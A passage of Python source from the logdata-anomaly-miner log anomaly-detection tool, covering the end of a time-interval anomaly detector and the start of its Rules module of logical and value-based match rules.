log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in match_dict.keys(): return False # Get current index from combination of values of paths of target_path_list id_tuple = () for id_path in self.target_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_values_flag is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Print message if combination of values is new if id_tuple not in self.appeared_time_list: additional_information = {"AffectedLogAtomValues": [str(repr(val))[2:-1] for val in id_tuple], "NewTime": log_atom.atom_time % self.time_period_length} msg = f"First time ({int(log_atom.atom_time % self.time_period_length)}) detected for [" for match_value in id_tuple: msg += str(match_value) + ", " msg = msg[:-2] + "]" self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) self.appeared_time_list[id_tuple] = [log_atom.atom_time % self.time_period_length] self.counter_reduce_time_intervals[id_tuple] = 0 if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Checks if the time has already been observed if log_atom.atom_time % self.time_period_length not in self.appeared_time_list[id_tuple]: # Check and print a message if the new time is out of range of the observed times # The second query is needed when time intervals exceed over 0/self.time_period_length if all((abs(log_atom.atom_time % self.time_period_length - time) > self.max_time_diff) and (abs(log_atom.atom_time % self.time_period_length - time) < self.time_period_length - self.max_time_diff) for time in self.appeared_time_list[id_tuple]): additional_information = {"AffectedLogAtomValues": [str(repr(val))[2:-1] for val in id_tuple], "PreviousAppearedTimes": [float(val) for val in self.appeared_time_list[id_tuple]], "NewTime": log_atom.atom_time % self.time_period_length} msg = f"New time ({int(log_atom.atom_time % self.time_period_length)}) out of range of previously observed times " \ f"{[int(x) for x in self.appeared_time_list[id_tuple]]} detected for [" for match_value in id_tuple: msg += str(match_value) + ", " msg = msg[:-2] + "]" self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) if not self.learn_mode: return True if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended self.insert_and_reduce_time_intervals(id_tuple, log_atom.atom_time % self.time_period_length) return True def insert_and_reduce_time_intervals(self, id_tuple, new_time): """Add the new time to the time list and reduce the time list after num_reduce_time_list of times have been appended.""" # Increase the counter of new times since last reduction self.counter_reduce_time_intervals[id_tuple] += 1 # Get the index in which the new time is inserted if new_time > self.appeared_time_list[id_tuple][-1]: time_index = len(self.appeared_time_list[id_tuple]) else: time_index = next(index for index, time in enumerate(self.appeared_time_list[id_tuple]) if time > new_time) # Insert the new time self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:time_index] + [new_time] +\ self.appeared_time_list[id_tuple][time_index:] # Reduce the time intervals, by removing the obsolete entries if self.counter_reduce_time_intervals[id_tuple] >= self.num_reduce_time_list: # Reset the counter self.counter_reduce_time_intervals[id_tuple] = 0 # Check every entry if it enlarges the time intervals, and remove it, if not. last_accepted_time = self.appeared_time_list[id_tuple][0] + self.time_period_length for index in range(len(self.appeared_time_list[id_tuple])-1, 0, -1): if last_accepted_time - self.appeared_time_list[id_tuple][index-1] < 2 * self.max_time_diff: del self.appeared_time_list[id_tuple][index] else: last_accepted_time = self.appeared_time_list[id_tuple][index] # Checks the last and first two time of the time list, and removes the obsolete entries if (len(self.appeared_time_list[id_tuple]) >= 4) and ( self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-2] < 2 * self.max_time_diff): self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][0] - self.appeared_time_list[id_tuple][-2] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-1] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [[], []] for id_tuple, time_list in self.appeared_time_list.items(): persist_data[0].append((id_tuple, time_list)) for id_tuple, counter in self.counter_reduce_time_intervals.items(): persist_data[1].append((id_tuple, counter)) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for id_tuple, time_list in persistence_data[0]: self.appeared_time_list[tuple(id_tuple)] = time_list for id_tuple, counter in persistence_data[1]: self.counter_reduce_time_intervals[tuple(id_tuple)] = counter logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def print_persistence_event(self, event_type, event_data): """Print the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)]) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format. " \ "The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same " \ "length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.appeared_time_list.keys()) values_list = list(values_set) values_list.sort() string = f"Time intervals are tracked for the following path values: {values_list}" elif len(event_data) == 1: id_tuple = event_data[0] # Check if the path value is tracked if id_tuple not in self.appeared_time_list: return f"Persistence includes no information for {id_tuple}." # Calculate the current time intervals time_intervals = [[max(0, t - self.max_time_diff), min(self.time_period_length, t + self.max_time_diff)] for t in self.appeared_time_list[id_tuple]] # Add time intervals, when the time intervals exceed the time period length or undercuts zero. if self.appeared_time_list[id_tuple][-1] + self.max_time_diff > self.time_period_length: time_intervals = [[0, self.appeared_time_list[id_tuple][-1] + self.max_time_diff - self.time_period_length]] +\ time_intervals if self.appeared_time_list[id_tuple][0] - self.max_time_diff < 0: time_intervals = time_intervals +\ [[self.appeared_time_list[id_tuple][0] - self.max_time_diff + self.time_period_length, self.time_period_length]] # Get the indices of the time windows whoch intercept and therefore are merged indices = [i for i in range(len(time_intervals) - 1) if time_intervals[i][1] > time_intervals[i + 1][0]] # Merge the time intervals for index in reversed(indices): time_intervals[index + 1][0] = time_intervals[index][0] time_intervals = time_intervals[:index] + time_intervals[index + 1:] # Set output string string = f"The list of appeared times is {self.appeared_time_list[id_tuple]} and the resulting time intervals are " \ f"{time_intervals} for path value {id_tuple}" return string def add_to_persistence_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\ len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\ not isinstance(event_data[1], (int, float)): msg = "Event_data has the wrong format. " \ "The supported format is [path_value_list, new_appeared_time], " \ "where path_value_list is a list of strings with the same length as paths defined in the config." logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) id_tuple = tuple(event_data[0]) new_time = event_data[1] msg = "" if id_tuple not in self.appeared_time_list: # Print message if combination of values is new msg = f"First time ({new_time % self.time_period_length}) added for {id_tuple}" self.appeared_time_list[id_tuple] = [new_time % self.time_period_length] self.counter_reduce_time_intervals[id_tuple] = 0 else: # Print a message if the new time is added to the list of observed times msg = f"New time ({new_time % self.time_period_length}) added to the range of previously observed times " \ f"{self.appeared_time_list[id_tuple]} for {id_tuple}" # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended self.insert_and_reduce_time_intervals(id_tuple, new_time % self.time_period_length) return msg def remove_from_persistence_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\ len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\ not isinstance(event_data[1], (int, float)): msg = "Event_data has the wrong format. " \ "The supported format is [path_value_list, old_appeared_time], " \ "where path_value_list is a list of strings with the same length as paths defined in the config." logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) id_tuple = tuple(event_data[0]) new_time = event_data[1] if id_tuple not in self.appeared_time_list: # Print message if combination of values is new msg = f"{id_tuple} has previously not appeared" elif not any(abs(new_time - val) < 0.5 for val in self.appeared_time_list[id_tuple]): # Print a message if the new time does not appear the list of observed times msg = f"Time ({new_time % self.time_period_length}) does not appear in the previously observed times " \ f"{self.appeared_time_list[id_tuple]} for {id_tuple}" else: # Remove the old time from the time list. for index in reversed(range(len(self.appeared_time_list[id_tuple]))): if abs(new_time - self.appeared_time_list[id_tuple][index]) < 0.5: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:index] +\ self.appeared_time_list[id_tuple][index + 1:] # Print a message if the new time is added to the list of observed times msg = f"Time ({new_time % self.time_period_length}) was removed from the range of previously observed times " \ f"{self.appeared_time_list[id_tuple]} for {id_tuple}" return msg def print(self, message, log_atom, affected_path, additional_information=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if additional_information is None: additional_information = {} original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = "" for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode(AminerConfig.ENCODING)] analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = "" for x in affected_path: tmp_str += " " + x + os.linesep tmp_str = tmp_str.lstrip(" ") sorted_log_lines = [tmp_str + log_atom.raw_data.decode(AminerConfig.ENCODING)] analysis_component = {"AffectedLogAtomPaths": affected_path} for key, value in additional_information.items(): analysis_component[key] = value event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, log_atom, self) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/Rules.py000066400000000000000000001200021500476301700324650ustar00rootroot00000000000000"""This package contains various classes to build check rulesets. The ruleset also supports parallel rule evaluation, e.g. the two rules "A and B and C" and "A and B and D" will only peform the checks for A and B once, then performs check C and D and trigger a match action. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import re import sys import abc import logging from datetime import datetime, timezone from aminer.util.History import LogarithmicBackoffHistory from aminer.util.History import ObjectHistory from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME from aminer import AminerConfig from aminer.events.EventInterfaces import EventHandlerInterface result_string = "%s(%s)" class MatchAction(metaclass=abc.ABCMeta): """This is the interface of all match actions.""" @abc.abstractmethod def match_action(self, log_atom): """Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ class EventGenerationMatchAction(MatchAction): """This generic match action forwards information about a rule match on parsed data to a list of event handlers.""" def __init__(self, event_type, event_message, event_handlers): self.event_type = event_type self.event_message = event_message self.event_handlers = event_handlers if not isinstance(event_type, str): msg = "event_type has to be of type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(event_type) == 0: msg = "event_type must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(event_message, str): msg = "event_message has to be of type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(event_handlers, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handlers): msg = "event_handlers has to be a list of EventHandlers." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(event_handlers) == 0: msg = "event_handlers must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) def match_action(self, log_atom): """Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ event_data = {} for handler in self.event_handlers: handler.receive_event(self.event_type, self.event_message, [log_atom.parser_match.match_element.annotate_match("")], event_data, log_atom, self) class AtomFilterMatchAction(MatchAction, SubhandlerFilter): """This generic match rule forwards all rule matches to a list of AtomHandlerInterface instances using the SubhandlerFilter.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): SubhandlerFilter.__init__(self, subhandler_list, stop_when_handled_flag) def match_action(self, log_atom): """Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ return self.receive_atom(log_atom) class MatchRule(metaclass=abc.ABCMeta): """This is the interface of all match rules.""" log_success = 0 log_total = 0 @abc.abstractmethod def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ def log_statistics(self, rule_id): """Log statistics of an MatchRule. Override this method for more sophisticated statistics output of the MatchRule. """ if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info("Rule '%s' processed %d out of %d log atoms successfully in the last 60 minutes.", rule_id, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 if hasattr(self, "sub_rules"): for i, rule in enumerate(self.sub_rules): rule.log_statistics(rule_id + "." + rule.__class__.__name__ + str(i)) if hasattr(self, "rule_lookup_dict"): for i, rule_key in enumerate(self.rule_lookup_dict): rule = self.rule_lookup_dict[rule_key] rule.log_statistics(rule_id + "." + rule.__class__.__name__ + str(i)) if hasattr(self, "default_rule"): self.default_rule.log_statistics(rule_id + ".default_rule." + self.default_rule.__class__.__name__) if hasattr(self, "sub_rule"): self.sub_rule.log_statistics(rule_id + "." + self.sub_rule.__class__.__name__) class AndMatchRule(MatchRule): """This class provides a rule to match all subRules (logical and).""" def __init__(self, sub_rules, match_action=None): """Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules): msg = "sub_rules has to be a list of MatchRules." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(sub_rules) < 2: msg = "At least two sub rules must exist in the AndMatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. Rule evaluation will stop when the first match fails. If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when all subrules matched. """ self.log_total += 1 for rule in self.sub_rules: if not rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): result = "" preamble = "" for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = " and " return result class OrMatchRule(MatchRule): """This class provides a rule to match any subRules (logical or).""" def __init__(self, sub_rules, match_action=None): """Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules): msg = "sub_rules has to be a list of MatchRules." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(sub_rules) < 2: msg = "At least two sub rules must exist in the AndMatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. Rule evaluation will stop when the first match succeeds. If a matchAction is attached to this rule, it will be invoked after the first match. @return True when any subrule matched. """ self.log_total += 1 for rule in self.sub_rules: if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = "" preamble = "" for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = " or " return result class ParallelMatchRule(MatchRule): """This class is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. """ def __init__(self, sub_rules, match_action=None): """Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action if not isinstance(sub_rules, list) or not all(isinstance(x, MatchRule) for x in sub_rules): msg = "sub_rules has to be a list of MatchRules." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(sub_rules) < 2: msg = "At least two sub rules must exist in the AndMatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if any of the subrules rule matches. The matching procedure will not stop after the first positive match. If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when any subrule matched. """ self.log_total += 1 match_flag = False for rule in self.sub_rules: if rule.match(log_atom): match_flag = True if match_flag and (self.match_action is not None): self.match_action.match_action(log_atom) if match_flag: self.log_success += 1 return match_flag def __str__(self): result = "" preamble = "" for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = " por " return result class ValueDependentDelegatedMatchRule(MatchRule): """This class is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. """ def __init__(self, target_path_list, rule_lookup_dict, default_rule=None, match_action=None): """ Create the rule. @param target_path_list with value paths that are used to extract the lookup keys for rule_lookup_dict. If value lookup fails, None will be used for lookup. @param rule_lookup_dict dictionary with tuple containing values for valuePathList as key and target rule as value. @param default_rule when not none, this rule will be executed as default. Otherwise, when rule lookup failed, False will be returned unconditionally. @param match_action if None, no action is performed. """ self.target_path_list = target_path_list self.rule_lookup_dict = rule_lookup_dict self.default_rule = default_rule self.match_action = match_action if not isinstance(target_path_list, list) or not all(isinstance(x, str) for x in target_path_list): msg = "target_path_list has to be a list of String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(target_path_list) == 0 or not all(x != "" for x in target_path_list): msg = "target_path_list must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(rule_lookup_dict, dict) or not all(isinstance(x, tuple) and len(x) != 0 for x in rule_lookup_dict.keys()) or \ not all(isinstance(x, MatchRule) for x in rule_lookup_dict.values()): msg = "rule_lookup_dict has to be a dict of with tuples as keys and MatchRules as values." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_rule is not None and not isinstance(default_rule, MatchRule): msg = "default_rule has to be of type MatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Try to locate a rule for delegation or use the default rule. @return True when selected delegation rule matched. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = tuple(value_list) else: value = None rule = self.rule_lookup_dict.get(value, self.default_rule) if rule is None: return False if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = "ValueDependentDelegatedMatchRule" return result class NegationMatchRule(MatchRule): """Match elements of this class return true when the subrule did not match.""" def __init__(self, sub_rule, match_action=None): self.sub_rule = sub_rule self.match_action = match_action if not isinstance(sub_rule, MatchRule): msg = "sub_rule has to be of type MatchRule." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 if self.sub_rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): return f"not {self.sub_rule}" class PathExistsMatchRule(MatchRule): """Match elements of this class return true when the given target_path was found in the parsed match data.""" def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 if self.target_path in log_atom.parser_match.get_match_dictionary(): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"hasPath({self.target_path})" class ValueMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and has exactly the given parsed value.""" def __init__(self, target_path, value, match_action=None): self.target_path = target_path self.value = value self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(value, (str, bytes)) and len(value) == 0: msg = "value must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if test_value is not None: if isinstance(self.value, bytes) and isinstance(test_value.match_object, str) and test_value.match_object is not None: test_value.match_object = test_value.match_object.encode() elif isinstance(self.value, str) and isinstance(test_value.match_object, bytes) and self.value is not None: self.value = self.value.encode() elif not isinstance(self.value, type(test_value.match_object)): raise TypeError(f"The type of the value of the ValueMatchRule does not match the test_value. value: {type(self.value)}, " f"test_value: {type(test_value.match_object)}") if (test_value is not None) and (test_value.match_object == self.value): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): if isinstance(self.value, bytes): self.value = self.value.decode() return f"value({self.target_path})=={self.value}" class ValueListMatchRule(MatchRule): """Match elements of this class return true when the given path exists and has exactly one of the values included in the value list.""" def __init__(self, target_path, target_value_list, match_action=None): self.target_path = target_path self.target_value_list = target_value_list self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(target_value_list, list): msg = "target_value_list must be of type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not all(isinstance(x, (bytes, str)) and len(x) != 0 or not isinstance(x, (bytes, str)) for x in target_value_list) or \ len(target_value_list) == 0: msg = "target values must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (test_value is not None) and (test_value.match_object in self.target_value_list): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"value({' '.join([str(value) for value in self.target_value_list])}) in {self.target_path}" class ValueRangeMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and the value is included in [lower, upper] range.""" def __init__(self, target_path, lower_limit, upper_limit, match_action=None): self.target_path = target_path self.lower_limit = lower_limit self.upper_limit = upper_limit self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(lower_limit, bool) or not isinstance(lower_limit, (int, float)): msg = "lower_limit has to be of type int or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(upper_limit, bool) or not isinstance(upper_limit, (int, float)): msg = "upper_limit has to be of type int or float." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if lower_limit >= upper_limit: msg = "lower_limit must be smaller than upper_limit." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if test_value is None: return False test_value = test_value.match_object if self.lower_limit <= test_value <= self.upper_limit: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"value({self.target_path}) inrange ({self.lower_limit}, {self.upper_limit})" class StringRegexMatchRule(MatchRule): """Elements of this class return true when the given path exists and the string repr of the value matches the regular expression.""" def __init__(self, target_path, match_regex, match_action=None): self.target_path = target_path self.match_regex = match_regex self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(match_regex, re.Pattern): msg = "match_regex has to be of type re.Pattern." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 # Use the class object as marker for nonexisting entries test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if (test_value is None) or (self.match_regex.match(test_value.match_string) is None): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): return f"string({self.target_path}) =regex= {self.match_regex.pattern}" class ModuloTimeMatchRule(MatchRule): """Match elements of this class return true when the following conditions are met. The given target_path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. """ def __init__(self, target_path, seconds_modulo, lower_limit, upper_limit, match_action=None, tzinfo=None): """ @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default timestamp associated with the match is used. """ self.target_path = target_path self.seconds_modulo = seconds_modulo self.lower_limit = lower_limit self.upper_limit = upper_limit self.match_action = match_action self.tzinfo = tzinfo if tzinfo is None: self.tzinfo = datetime.now(timezone.utc).astimezone().tzinfo if not isinstance(target_path, str): msg = "target_path has to be of type String." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(seconds_modulo, bool) or not isinstance(seconds_modulo, int): msg = "seconds_modulo has to be of type int." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if seconds_modulo <= 0: msg = 